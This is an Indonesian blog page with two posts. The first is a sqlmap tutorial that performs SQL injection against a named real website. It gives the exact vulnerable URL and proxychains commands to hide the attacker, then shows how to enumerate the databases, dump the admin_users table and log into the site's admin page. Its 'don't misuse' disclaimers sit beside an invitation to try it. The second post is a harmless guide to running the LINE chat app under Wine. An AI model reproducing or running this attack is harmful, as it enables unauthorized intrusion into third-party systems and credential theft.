SQLmap Web Database Pentesting

Minggu, 30 Juni 2013
Sahabat blogger, tentu kalian tidak asing lagi dengan tool yang satu ini, terutama pecinta pentesting, banyak sekali defacer menggunakan trik ini untuk mengatahui database suatu web sakaligus passwordnya, tapi tidak ada salahnya kita mencoba..
namun sebelumnya saya sampaikan, tolong ilmu ini hanya sekedar pembelajaran saja sucuil ilmu tentang pentesting security, mohon janga disalah gunakan..

Untuk menghindari tindakan kriminal, saya dalam menulis artikel ini hanya sebatas menyampaikan hasil dari vuln dan deface dari hacker luar negeri, jadi murni bukan dari saya pribadi, karena maksud saya menulis artikel ini hanya sebatas menyampaikan dan menularkan ilmu kepada teman-teman semuanya...
jadi mohon jangan disalah gunakan, ok ^_^

sebelumnya siapkan dulu alat tempurnya, yaitu sqlmap..
bagi kalian pengguna distro pentesting seperti backtrack dan blackbuntu tentu tidak usah repot-repot install aplikasi ini karena sudah default terinstall di kedua distro tersebut, namun pentesting dapat dilakukan di distro manapun, karenan kemampuan anda menggambarkan reputasi anda, bukan berbagai tools yang anda miliki, toh tools yang anda pakai adalah buatan orang lain, apalagi berbasis GUI,, gak banget deh 
bagi pengguna ubuntu seperti saya install dulu aplikasinya, jangan lupa tambahkan repo backtrack, caranya dapat dilihat disini Update dan Upgrade Java MacBuntu rasa BackTrack.
silahkan install sqlmapnya, jangan lupa jalan di root


root@arum:/home/sandy# apt-get install sqlmap
klo sudah install akan nampak seperti ini 

setelah aplikasi sqlmap terinstall sekarang kita cari target, tentunya yang mempunya vuln,
dan saya tegaskan saya tidak berniat jahat untuk merusak, untuk anda lebih percaya bahwa tujuan saya adalah "baik-baik" maka saya akan memilih target yang pernah dijamah hacker luar, sepertinya hacker dari turki, untuk meyakinkan silahkan kunjungi alamat berikut http://www.hanhdance.com/
lihat laman utamanya, sudah pernah di deface orang lain kan?

tips selanjutnya, agar lebih aman dalam melakukan pentesting sebagai anda menggunakan jalur proxy, sukur-sukur ssh tunneling,
kalian dapat menggunakan tools proxychains, untuk konfigurasinya dapat kalian lihat di sini 

Tunneling ssh dengan PAC Tunnel Manager di Ubuntu

Tunneling SSH di Linux Ubuntu

dan vuln websitenya adalah : http://www.hanhdance.com/gallery.php?id=47

itu target kita gan, buka aplikasi sqlmap atau bisa melalui terminal, jangan lupa status root


root@arum:/home/sandy# cd /pentest/database/sqlmap/
root@arum:/pentest/database/sqlmap# 

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u www.webtarget.com --dbs
maka: 
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 --dbs
dan nampak list databasenya

available databases [3]:                                                       
[*] hanhdanceeditor
[*] information_schema
[*] test

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database --tables
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor --tables
dan nampak list tables dari database hanhdanceeditor

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database -T nama_tables --columns
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --columns
maka akan terlihat list columns
Database: hanhdanceeditor                                                      
Table: admin_users

sekarang finalisasi eksekusi deh pass dan user dengan dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u www.webtarget.com -D nama_database -T nama_tables --dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --dump
taraaaa, password dan usernya sudah terlihat
Table: admin_users
sekarang buka laman berikut dan masukan user dan passwordnya



Halaman Admin Target





silahkan dicoba, tapi ingat jangan disalahgunakan ea? ^_^





Cara Menjalankan Aplikasi Line di Linux

Jumat, 28 Juni 2013
sahabat blogger, kali ini saya akan membagikan tips bagaimana cara menjalankan aplikasi wine di Linux, bagi kalian yang belum tahu apa itu Line, line adalah aplikasi Chat multi platform, bisa berjalan di Ponsel Android dan IOS, untuk dekstop bisa berjalan di windows dan Mac Os, sayangnya aplikasi ini tidak support untuk dijalankan di OS linux

solusi terakhir adalah install aplikasi line lewat wine, namun hal ini juga berujung pada kegagalan, karena aplikasi Line juga tetap tidak bisa diinstall.
tapi tenang, setalah saya googling sana sini akhirnya saya menemukan solusinya, trik ini saya ambil dari blog luar, yaitu solutions4linux.blogspot.com  dan deprito.net, bagi  pemilik blog saya ucapkan banyak terimakasih atas bantuan dan solusinya.

Namun untuk keperluan register kalian harus punya akun Line yang didaftarkan melalui Ponsel Android kalian, jika belum punya bisa diakali dengan bluestack maupun android-x86, tapi jika memang tidak bisa, kalian bisa minta bantuan teman yang punya hp android untuk mendaftarkanya

ok, langsung saja kita praktek, tapi sebelumnya linux kalian sudah terinstall wine dan terhubung ke internet ya? ^_^
hal lain yang perlu dipersiapkan adalah
- p7zip-full
- vcrun2008 with winetricks

buka terminal dan jalankan script berikut:


mkdir line_tmp
cd line_tmp
wget http://dl.desktop.line.naver.jp/naver/LINE/win/LineInst.exe
7z x -y LineInst.exe
inode1=$(ls -ilab | awk 'FNR == 4 {print $1}')
inode2=$(ls -ilab | awk 'FNR == 6 {print $1}')
find . -inum $inode1 -exec mv {} LINE \;
find . -inum $inode2 -exec mv {} resources \;
mv ./resources/res ./LINE
mv ./LINE ../
cd ..
rm -R line_tmp
jika sudah, lakukan perintah berikut diterminal, sebelumnya saya sampaikan akan ada warning error seperti script di bawah ini, dan abaikan saja, Ok ^_^ !

sandy@arum:~$
/line_tmp $ find . -inum $inode1 -exec mv {} LINE \;
find: `./\001\025': No such file or directory
sandy@arum:~$ ~/line_tmp $ find . -inum $inode2 -exec mv {} resources \;
find: `./\001\037': No such file or directory

selamat mencoba, jangan lupa add line aku ya? sandyhackers

selamat berchat ria dengan Line

 

Linux Opensource & Phreaking Copyright © 2011-2012 | Powered by Blogger